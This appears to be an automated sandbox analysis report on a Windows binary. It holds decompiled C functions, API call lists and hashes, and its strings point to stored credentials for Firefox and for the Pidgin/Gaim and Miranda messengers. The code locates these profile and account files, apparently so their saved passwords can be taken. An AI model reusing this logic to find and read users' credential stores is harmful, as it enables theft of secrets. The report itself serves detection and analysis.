                                • Opcode Fuzzy Hash: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                • Instruction Fuzzy Hash: 4C0128B1740B00B6D231EF29DC43F6A7BA49F91B18F100B1EF1526A6C1E7B8B244865D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E0040AE7D(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				intOrPtr _v20;
                                				void* __ebx;
                                				signed int _t63;
                                				intOrPtr _t67;
                                				intOrPtr _t72;
                                				intOrPtr _t74;
                                				signed int _t79;
                                				void* _t84;
                                				signed int _t86;
                                				signed int _t87;
                                				char* _t98;
                                				void* _t100;
                                				void* _t102;
                                				void* _t104;
                                				void* _t106;
                                				void* _t107;
                                
                                				_t84 = __eax;
                                				E0040972B(__eax, __eflags);
                                				_t86 = 0;
                                				_v12 = 0;
                                				while(1) {
                                					_t98 = _a4;
                                					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
                                						break;
                                					}
                                					_t86 = _t86 + 1;
                                					if(_t86 < 1) {
                                						continue;
                                					}
                                					if(strlen(_t98) >= 3) {
                                						break;
                                					}
                                					_t79 = atoi(_a4);
                                					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
                                						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                					}
                                					L21:
                                					if(_a8 != 0) {
                                						_v12 = _v12 | 0x00001000;
                                					}
                                					_t87 =  *0x41e394; // 0x1
                                					_t63 = _v12;
                                					 *0x41e394 =  *0x41e394 + 1;
                                					 *((intOrPtr*)(0x41e398 + _t87 * 4)) = _t63;
                                					return _t63;
                                				}
                                				_t104 = 0;
                                				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                				_v16 = 0;
                                				_v8 = 0;
                                				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                					L14:
                                					_t100 = 0;
                                					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                					_v8 = 0;
                                					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                						L20:
                                						goto L21;
                                					}
                                					_t106 = 0;
                                					__eflags = 0;
                                					do {
                                						_v20 = E00407139(0, _a4);
                                						_t67 = E00407139(0, _a4);
                                						__eflags = _v20;
                                						if(_v20 >= 0) {
                                							L18:
                                							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                							goto L19;
                                						}
                                						__eflags = _t67;
                                						if(_t67 < 0) {
                                							goto L19;
                                						}
                                						goto L18;
                                						L19:
                                						_v8 = _v8 + 1;
                                						_t100 = _t100 + 0x10;
                                						_t106 = _t106 + 0x14;
                                						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                					goto L20;
                                				}
                                				_t102 = 0;
                                				__eflags = 0;
                                				do {
                                					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
                                					0x413d74(_t72, _a4);
                                					_v20 = _t72;
                                					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
                                					0x413d74(_t74, _a4);
                                					_t107 = _t107 + 0x10;
                                					__eflags = _v20;
                                					if(_v20 == 0) {
                                						L11:
                                						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
                                						_v16 = 1;
                                						goto L12;
                                					}
                                					__eflags = _t74;
                                					if(_t74 != 0) {
                                						goto L12;
                                					}
                                					goto L11;
                                					L12:
                                					_v8 = _v8 + 1;
                                					_t102 = _t102 + 0x10;
                                					_t104 = _t104 + 0x14;
                                					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                				__eflags = _v16;
                                				if(_v16 != 0) {
                                					goto L20;
                                				}
                                				goto L14;
                                			}























                                APIs
                                  • Part of subcall function 0040972B: ??2@YAPAXI@Z.MSVCRT ref: 0040974C
                                  • Part of subcall function 0040972B: ??3@YAXPAX@Z.MSVCRT ref: 00409813
                                • strlen.MSVCRT ref: 0040AEA3
                                • atoi.MSVCRT ref: 0040AEB1
                                • _mbsicmp.MSVCRT ref: 0040AF04
                                • _mbsicmp.MSVCRT ref: 0040AF17
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                • String ID:
                                • API String ID: 4107816708-0
                                • Opcode ID: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                • Instruction ID: 08bf478f3eb11018bf028c01ffb7f168253fa3ae9792e106a9a4f60ade7b3b20
                                • Opcode Fuzzy Hash: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                • Instruction Fuzzy Hash: B8414975900305EFCB11DF69D580A9ABBF4FB48308F1084BAEC15AB392D778DA51CB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen
                                • String ID: >$>$>
                                • API String ID: 39653677-3911187716
                                • Opcode ID: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                • Instruction ID: dc7a302430b06bbc29ce8331a0d654e54ba56492e0c60a2da2e35593be10561b
                                • Opcode Fuzzy Hash: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                • Instruction Fuzzy Hash: 7B31FBA580D2C4AED7219F6880557EEFFA14F22305F1886DAC0D447383C22C9BCAD75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040EA89
                                • strlen.MSVCRT ref: 0040EA8F
                                • strlen.MSVCRT ref: 0040EA9C
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: accounts.xml
                                • API String ID: 581844971-666780623
                                • Opcode ID: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                • Instruction ID: 3a6749a91d87314aa81efbea2023e77c1fe97455d9ba7aea10baf3c7dddfb932
                                • Opcode Fuzzy Hash: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                • Instruction Fuzzy Hash: 9C210471A041186BCB10EB66DC416DFB7F8AF55314F0484BBE009E7142DBB8EA958FE8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040EB70
                                • strlen.MSVCRT ref: 0040EB76
                                • strlen.MSVCRT ref: 0040EB83
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: accounts.xml
                                • API String ID: 581844971-666780623
                                • Opcode ID: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                • Instruction ID: f45e0dada1ac7c46e734b25b908a600237734d5f3cbc55dd7ef5ba4cf50aaebb
                                • Opcode Fuzzy Hash: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                • Instruction Fuzzy Hash: AD21F5719041185BDB11EB26DC41ACA77BC5F51314F0484BBA508E7141DBB8EAD68FD8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00407364(void* __eax, char* _a4, int _a8) {
                                				void* __edi;
                                				intOrPtr _t30;
                                				intOrPtr _t33;
                                				intOrPtr _t44;
                                				intOrPtr _t52;
                                				intOrPtr* _t54;
                                				intOrPtr* _t55;
                                				void* _t56;
                                
                                				_t56 = __eax;
                                				if(_a8 == 0xffffffff) {
                                					_a8 = strlen(_a4);
                                				}
                                				_t44 =  *((intOrPtr*)(_t56 + 4));
                                				_t52 = _t44 + _a8 + 1;
                                				_t30 =  *((intOrPtr*)(_t56 + 0x14));
                                				 *((intOrPtr*)(_t56 + 4)) = _t52;
                                				_t54 = _t56 + 0x10;
                                				if(_t52 != 0xffffffff) {
                                					E00406982(_t56, _t52, _t54, 1, _t30);
                                				} else {
                                					0x413de6( *_t54);
                                				}
                                				_t53 =  *(_t56 + 0x1c);
                                				_t33 =  *((intOrPtr*)(_t56 + 0x18));
                                				_t55 = _t56 + 0xc;
                                				if( *(_t56 + 0x1c) != 0xffffffff) {
                                					E00406982(_t56 + 8, _t53, _t55, 4, _t33);
                                				} else {
                                					0x413de6( *_t55);
                                				}
                                				memcpy( *((intOrPtr*)(_t56 + 0x10)) + _t44, _a4, _a8);
                                				 *((char*)( *((intOrPtr*)(_t56 + 0x10)) + _t44 + _a8)) = 0;
                                				 *((intOrPtr*)( *_t55 +  *(_t56 + 0x1c) * 4)) = _t44;
                                				 *(_t56 + 0x1c) =  *(_t56 + 0x1c) + 1;
                                				_t27 =  *(_t56 + 0x1c) - 1; // -1
                                				return _t27;
                                			}












                                APIs
                                • strlen.MSVCRT ref: 00407375
                                  • Part of subcall function 00406982: malloc.MSVCRT ref: 0040699E
                                  • Part of subcall function 00406982: memcpy.MSVCRT ref: 004069B6
                                  • Part of subcall function 00406982: ??3@YAXPAX@Z.MSVCRT ref: 004069BF
                                • ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                • ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                • memcpy.MSVCRT ref: 004073DB
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@$memcpy$mallocstrlen
                                • String ID:
                                • API String ID: 1171893557-0
                                • Opcode ID: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
                                • Instruction ID: d47861f91907e87d10e443503ad883c0cefe0bd36095b640ea2ff485cde935f6
                                • Opcode Fuzzy Hash: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
                                • Instruction Fuzzy Hash: 53218C71204604AFD730DF18E881996B7F5EF04324B208A2EFC6A9B6D1C735FA59CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00407944(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                				signed int _t21;
                                				signed int _t23;
                                				void* _t24;
                                				signed int _t31;
                                				void* _t32;
                                				void* _t33;
                                				void* _t44;
                                				signed int _t46;
                                				void* _t48;
                                				signed int _t51;
                                				int _t52;
                                				void** _t53;
                                				void* _t58;
                                
                                				_t53 = __esi;
                                				_t1 =  &(_t53[1]); // 0x0
                                				_t51 =  *_t1;
                                				_t21 = 0;
                                				if(_t51 <= 0) {
                                					L4:
                                					_t2 =  &(_t53[2]); // 0x8
                                					_t33 =  *_t53;
                                					_t23 =  *_t2 + _t51;
                                					_t46 = 8;
                                					_t53[1] = _t23;
                                					_t24 = _t23 * _t46;
                                					0x413d5c( ~(0 | _t58 > 0x00000000) | _t24, _t32);
                                					_t10 =  &(_t53[1]); // 0x0
                                					 *_t53 = _t24;
                                					memset(_t24, 0,  *_t10 << 3);
                                					_t52 = _t51 << 3;
                                					memcpy( *_t53, _t33, _t52);
                                					if(_t33 != 0) {
                                						0x413d56(_t33);
                                					}
                                					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                				} else {
                                					_t44 =  *__esi;
                                					_t48 = _t44;
                                					while( *_t48 != 0) {
                                						_t21 = _t21 + 1;
                                						_t48 = _t48 + 8;
                                						_t58 = _t21 - _t51;
                                						if(_t58 < 0) {
                                							continue;
                                						} else {
                                							goto L4;
                                						}
                                						goto L7;
                                					}
                                					_t31 = _t21 << 3;
                                					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                				}
                                				L7:
                                				return 1;
                                			}

















                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@??3@memcpymemset
                                • String ID:
                                • API String ID: 1865533344-0
                                • Opcode ID: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
                                • Instruction ID: be4f301e428eab7478e357bf13cd6827c7edeb2881237a21e1a336ab79825493
                                • Opcode Fuzzy Hash: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
                                • Instruction Fuzzy Hash: C8116DB1608601AFE329DF19D881A26F7E5FF88300F20892EE4DA87391D635E841CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0040E4B6(intOrPtr _a4, char* _a8) {
                                				intOrPtr _v8;
                                				void _v275;
                                				char _v276;
                                				int _t17;
                                				void* _t21;
                                
                                				_v8 = 1;
                                				_v276 = 0;
                                				memset( &_v275, 0, 0x104);
                                				_t17 = strlen(_a8);
                                				_t6 = strlen(0x41894c) + 1; // 0x1
                                				if(_t17 + _t6 >= 0x104) {
                                					_v276 = 0;
                                				} else {
                                					E00406B4B( &_v276, _a8, 0x41894c);
                                				}
                                				_t21 = E004069D3( &_v276);
                                				_t38 = _t21;
                                				if(_t21 != 0) {
                                					_v8 = E0040E293(_t38, _a4,  &_v276);
                                				}
                                				return _v8;
                                			}









                                APIs
                                • memset.MSVCRT ref: 0040E4DF
                                • strlen.MSVCRT ref: 0040E4EA
                                • strlen.MSVCRT ref: 0040E4F8
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: prefs.js
                                • API String ID: 581844971-3783873740
                                • Opcode ID: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                • Instruction ID: 18aa10c61fb3677f8c34c5df747d0d2d010b9cd1cf1f562783039ea2ec755a14
                                • Opcode Fuzzy Hash: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                • Instruction Fuzzy Hash: 9C01C87190011CBADB11EA95EC42BCABBAC9F0531DF1008BBE604E2181E7B49B948794
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E0040D4E9(void* __eax) {
                                				void _v267;
                                				char _v268;
                                				int _t12;
                                				char _t16;
                                				char* _t27;
                                
                                				_t27 = __eax + 0x20a;
                                				 *_t27 = 0;
                                				_v268 = 0;
                                				memset( &_v267, 0, 0x104);
                                				0x41223f(0x1a);
                                				_t12 = strlen("Mozilla\Profiles");
                                				_t6 = strlen( &_v268) + 1; // 0x1
                                				if(_t12 + _t6 >= 0x104) {
                                					 *_t27 = 0;
                                				} else {
                                					E00406B4B(_t27,  &_v268, "Mozilla\Profiles");
                                				}
                                				_t16 = E004069D3(_t27);
                                				if(_t16 == 0) {
                                					 *_t27 = _t16;
                                					return _t16;
                                				}
                                				return _t16;
                                			}









                                APIs
                                • memset.MSVCRT ref: 0040D516
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 0040D52E
                                • strlen.MSVCRT ref: 0040D53C
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
                                • String ID: Mozilla\Profiles
                                • API String ID: 2008385565-2796945589
                                • Opcode ID: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                • Instruction ID: 3c6ae931ffe100bc814a6c4c739c4374e257fa1fb59e82d364b3a540d615c615
                                • Opcode Fuzzy Hash: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                • Instruction Fuzzy Hash: 2201F07290821466D711A6699C42FCA779C4F21759F2404BBF5C5F31C2EDB899C443A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E0040D578(void* __eax) {
                                				void _v267;
                                				char _v268;
                                				int _t12;
                                				char _t16;
                                				char* _t27;
                                
                                				_t27 = __eax + 0x61e;
                                				 *_t27 = 0;
                                				_v268 = 0;
                                				memset( &_v267, 0, 0x104);
                                				0x41223f(0x1a);
                                				_t12 = strlen(".purple");
                                				_t6 = strlen( &_v268) + 1; // 0x1
                                				if(_t12 + _t6 >= 0x104) {
                                					 *_t27 = 0;
                                				} else {
                                					E00406B4B(_t27,  &_v268, ".purple");
                                				}
                                				_t16 = E004069D3(_t27);
                                				if(_t16 == 0) {
                                					 *_t27 = _t16;
                                					return _t16;
                                				}
                                				return _t16;
                                			}









                                APIs
                                • memset.MSVCRT ref: 0040D5A5
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 0040D5BD
                                • strlen.MSVCRT ref: 0040D5CB
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
                                • String ID: .purple
                                • API String ID: 2008385565-1504268026
                                • Opcode ID: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
                                • Instruction ID: 5dc147b8957afa7b06b9bacfad0a4e1db4396cb0d3e541dfcccdd27de6d8d665
                                • Opcode Fuzzy Hash: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
                                • Instruction Fuzzy Hash: 8C0120725081146AD711A669DC42BCA779C4F21709F2404BFF5C5F71C2FEB899C543AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E0040D607(void* __eax) {
                                				void _v267;
                                				char _v268;
                                				int _t12;
                                				char _t16;
                                				char* _t27;
                                
                                				_t27 = __eax + 0x30f;
                                				 *_t27 = 0;
                                				_v268 = 0;
                                				memset( &_v267, 0, 0x104);
                                				0x41223f(0x1a);
                                				_t12 = strlen(".gaim");
                                				_t6 = strlen( &_v268) + 1; // 0x1
                                				if(_t12 + _t6 >= 0x104) {
                                					 *_t27 = 0;
                                				} else {
                                					E00406B4B(_t27,  &_v268, ".gaim");
                                				}
                                				_t16 = E004069D3(_t27);
                                				if(_t16 == 0) {
                                					 *_t27 = _t16;
                                					return _t16;
                                				}
                                				return _t16;
                                			}









                                APIs
                                • memset.MSVCRT ref: 0040D634
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 0040D64C
                                • strlen.MSVCRT ref: 0040D65A
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
                                • String ID: .gaim
                                • API String ID: 2008385565-3490432478
                                • Opcode ID: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
                                • Instruction ID: a115bc8fa66553d394cd4cab83c679d7ef9605289ec37c5517f9616187ac7207
                                • Opcode Fuzzy Hash: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
                                • Instruction Fuzzy Hash: 540120729082546AD721A6699C42BCB779C4F21709F2008BFF5C8F31C2EEBC5AC543A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E0040D696(void* __eax) {
                                				void _v267;
                                				char _v268;
                                				int _t12;
                                				char _t16;
                                				char* _t27;
                                
                                				_t27 = __eax + 0x414;
                                				 *_t27 = 0;
                                				_v268 = 0;
                                				memset( &_v267, 0, 0x104);
                                				0x41223f(0x1a);
                                				_t12 = strlen("Miranda");
                                				_t6 = strlen( &_v268) + 1; // 0x1
                                				if(_t12 + _t6 >= 0x104) {
                                					 *_t27 = 0;
                                				} else {
                                					E00406B4B(_t27,  &_v268, "Miranda");
                                				}
                                				_t16 = E004069D3(_t27);
                                				if(_t16 == 0) {
                                					 *_t27 = _t16;
                                					return _t16;
                                				}
                                				return _t16;
                                			}









                                APIs
                                • memset.MSVCRT ref: 0040D6C3
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 0040D6DB
                                • strlen.MSVCRT ref: 0040D6E9
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
                                • String ID: Miranda
                                • API String ID: 2008385565-4004425691
                                • Opcode ID: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
                                • Instruction ID: c142bb7588fded06bca0c3959130fc7bc280b220a29219a6f5312b9b0058b910
                                • Opcode Fuzzy Hash: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
                                • Instruction Fuzzy Hash: 180120769081146AD721BA699C42BDA779C4F21709F2404BBF5C4F31C2EEB859C543BD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbscpy
                                • String ID:
                                • API String ID: 714388716-0
                                • Opcode ID: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                • Instruction ID: dce8e19ef7dbf3e453dc58d21b67a2b53133f69bc0796553bf20bccd0e5dc17f
                                • Opcode Fuzzy Hash: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                • Instruction Fuzzy Hash: 310144769002089BCB22EBA5DC85EDB77BCAF88305F0004ABF54797141EF38A7C48B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E0040B15B(void* __esi) {
                                				void* _v260;
                                				char _v516;
                                				void* __ebx;
                                				long _t16;
                                				signed short _t24;
                                				signed short _t26;
                                				void* _t27;
                                
                                				_t27 = __esi;
                                				_push(E00409445( *((intOrPtr*)(__esi + 0x390))));
                                				_t24 = 4;
                                				sprintf( &_v260, E0040876F(_t24));
                                				_t16 = E004099DC( *((intOrPtr*)(__esi + 0x390)), 0);
                                				if(_t16 > 0) {
                                					_t26 = 5;
                                					sprintf( &_v516, E0040876F(_t26));
                                					_t16 =  &_v260;
                                					0x413cf4(_t16,  &_v516, _t16);
                                				}
                                				if( *((intOrPtr*)(_t27 + 0x108)) != 0) {
                                					return SendMessageA( *(_t27 + 0x114), 0x401, 0,  &_v260);
                                				}
                                				return _t16;
                                			}











                                APIs
                                  • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
                                  • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                • sprintf.MSVCRT ref: 0040B181
                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B1E4
                                  • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                  • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                • sprintf.MSVCRT ref: 0040B1AB
                                • _mbscat.MSVCRT ref: 0040B1BE
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                • String ID:
                                • API String ID: 203655857-0
                                • Opcode ID: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                • Instruction ID: ecab945e31bd422c391273073b57af520698e657e98585e8788b6dab187b6cf3
                                • Opcode Fuzzy Hash: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                • Instruction Fuzzy Hash: 0E0167B25003046AD721B775DC86FEB73AC6B04704F14046FB655B6182EA79EA848A68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E00405E4A(char* _a4) {
                                				void _v267;
                                				char _v268;
                                				int _t12;
                                				signed int _t16;
                                
                                				_v268 = 0;
                                				memset( &_v267, 0, 0x104);
                                				_t12 = strlen(_a4);
                                				_t5 = strlen(0x418198) + 1; // 0x1
                                				if(_t12 + _t5 >= 0x104) {
                                					_v268 = 0;
                                				} else {
                                					E00406B4B( &_v268, _a4, 0x418198);
                                				}
                                				_t16 = E004069D3( &_v268);
                                				asm("sbb eax, eax");
                                				return  ~( ~_t16);
                                			}








                                APIs
                                • memset.MSVCRT ref: 00405E6C
                                • strlen.MSVCRT ref: 00405E74
                                • strlen.MSVCRT ref: 00405E81
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: nss3.dll
                                • API String ID: 581844971-2492180550
                                • Opcode ID: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                • Instruction ID: 0509c7bfbc4d162460136cac1117631891986418d94c1b22c83112455de3b5d3
                                • Opcode Fuzzy Hash: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                • Instruction Fuzzy Hash: 44F0CD7140C1186BDB10E769DC45FDA7BAC8F61719F1000B7F589E60C1DAB8ABC546A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E0040A6B4(intOrPtr* __ecx, intOrPtr _a4) {
                                				void _v259;
                                				char _v260;
                                				void _v515;
                                				char _v516;
                                				void* __esi;
                                				void* _t15;
                                				intOrPtr* _t24;
                                				char* _t26;
                                
                                				_t24 = __ecx;
                                				_v260 = 0;
                                				memset( &_v259, 0, 0xfe);
                                				_v516 = 0;
                                				memset( &_v515, 0, 0xfe);
                                				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
                                				_t26 =  &_v260;
                                				E00409DD6(_t26, _t15);
                                				_push(_t26);
                                				sprintf( &_v516, "</%s>");
                                				return E004067EC(_a4,  &_v516);
                                			}












                                APIs
                                • memset.MSVCRT ref: 0040A6D7
                                • memset.MSVCRT ref: 0040A6ED
                                  • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
